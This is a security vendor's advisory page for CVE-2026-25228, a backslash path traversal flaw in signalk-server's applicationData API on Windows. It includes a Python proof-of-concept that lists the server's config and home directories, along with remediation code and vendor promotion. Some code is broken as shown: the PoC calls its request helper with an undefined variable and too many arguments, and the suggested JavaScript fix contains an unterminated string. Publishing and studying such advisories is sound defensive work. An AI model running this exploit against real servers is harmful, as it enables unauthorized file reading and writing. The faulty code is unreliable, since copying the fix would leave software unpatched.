CVE-2026-25228

CVE-2026-25228 is a medium-severity path traversal vulnerability in signalk-server (npm), affecting versions <= 2.20.2. It is fixed in 2.20.3.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

SignalK Server has Path Traversal leading to information disclosure

A Path Traversal vulnerability in SignalK Server's applicationData API allows authenticated users on Windows systems to read, write, and list arbitrary files and directories on the filesystem. The validateAppId() function blocks forward slashes (/) but not backslashes (\), which are treated as directory separators by path.join() on Windows. This enables attackers to escape the intended applicationData directory.

Details

Platform: Windows (Linux only allows traversal up a single directory)
Authentication Required: Yes (ability to write depends on user's permission)

The vulnerability exists in the validateAppId() function within the applicationData API handler. This function validates the appid parameter but only checks for forward slashes:

// Simplified vulnerable code pattern
function validateAppId(appid) {
  if (appid.includes('/') || appid.length >= 30) {
    return false;
  }
  return true;
}

// Later used in path construction
const dataPath = path.join(configPath, 'applicationData', 'users', deviceId, appid);

Root Cause:

  • The validation only blocks / characters
  • On Windows, path.join() uses the platform's native path separator
  • Windows treats both / and \ as valid directory separators
  • Backslash-based traversal sequences like ..\..\.. pass validation
  • When path.join() processes these on Windows, each .. traverses up one directory level

PoC

#!/usr/bin/env python3

import argparse
import http.client
import json
import sys
from urllib.parse import urlparse

PREFIX = "/signalk/v1/applicationData"


def raw_get(base, path, token):
    """
    GET using http.client so that '..' and backslashes in the URL
    are sent literally (requests/urllib would normalise them away).
    """
    parsed = urlparse(base)
    host, port = parsed.hostname, parsed.port or 80
    conn = http.client.HTTPConnection(host, port)
    conn.request("GET", path, headers={"Authorization": f"Bearer {token}"})
    resp = conn.getresponse()
    status = resp.status
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return status, body


def main():
    ap = argparse.ArgumentParser(description="Signal K Windows path traversal PoC")
    ap.add_argument("--target", required=True, help="e.g. http://192.168.1.100:3000")
    ap.add_argument("--token", required=True, help="any valid JWT token")
    args = ap.parse_args()

    base = args.target.rstrip("/")

    # On Windows, path.join(configPath, "applicationData", "users", id, appid)
    # resolves each '..' upward when separated by backslashes.
    #
    # Depth from base (configPath/applicationData/users/):
    #   ..              → applicationData/users/          (1 level)
    #   ..\..           → applicationData/                (2 levels)
    #   ..\..\..        → configPath (.signalk)           (3 levels)
    #   ..\..\..\..     → user home directory             (4 levels)

    traversals = [
        ("..\\..\\..\\", ".signalk config directory"),
        ("..\\..\\..\\..\\", "user home directory"),
    ]

    for appid, description in traversals:
        path = f"{PREFIX}/user/{appid}"
        status, body = raw_get(base, path, token, args.token)

        print(f"[{status}] {description}")
        print(f"  GET {path}")

        if status == 200:
            try:
                entries = json.loads(body)
                for entry in entries:
                    print(f"    {entry}")
            except json.JSONDecodeError:
                print(f"    {body[:200]}")
        else:
            print(f"    {body[:200]}")
        print()


if __name__ == "__main__":
    main()

Reproduction Steps:

  1. Set up SignalK Server on a Windows machine
  2. Obtain a valid device or user authentication token
  3. Run the PoC script:
    python3 poc_windows_appid_traversal.py --target http://[signalK server IP]:3000 --token <YOUR_TOKEN>
    

Impact

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-25228 has a CVSS score of 5.0 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.20.3); upgrading removes the vulnerable code path.

Affected versions

signalk-server (<= 2.20.2)

Security releases

signalk-server → 2.20.3 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Short-term:

  1. Add backslash validation to validateAppId():

    function validateAppId(appid) {
      if (appid.includes('/') || appid.includes('\') || appid.length >= 30) {
        return false;
      }
      return true;
    }
    
  2. Use path.normalize() and validate that resolved paths remain within the intended directory:

    const resolvedPath = path.normalize(path.join(baseDir, appid));
    if (!resolvedPath.startsWith(path.normalize(baseDir))) {
      throw new Error('Invalid path');
    }
    

Frequently Asked Questions

  1. What is CVE-2026-25228? CVE-2026-25228 is a medium-severity path traversal vulnerability in signalk-server (npm), affecting versions <= 2.20.2. It is fixed in 2.20.3. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-25228? CVE-2026-25228 has a CVSS score of 5.0 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of signalk-server are affected by CVE-2026-25228? signalk-server (npm) versions <= 2.20.2 is affected.
  4. Is there a fix for CVE-2026-25228? Yes. CVE-2026-25228 is fixed in 2.20.3. Upgrade to this version or later.
  5. Is CVE-2026-25228 exploitable, and should I be worried? Whether CVE-2026-25228 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-25228 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-25228? Upgrade signalk-server to 2.20.3 or later.

Other vulnerabilities in signalk-server

Stop the waste.
Protect your environment with Kodem.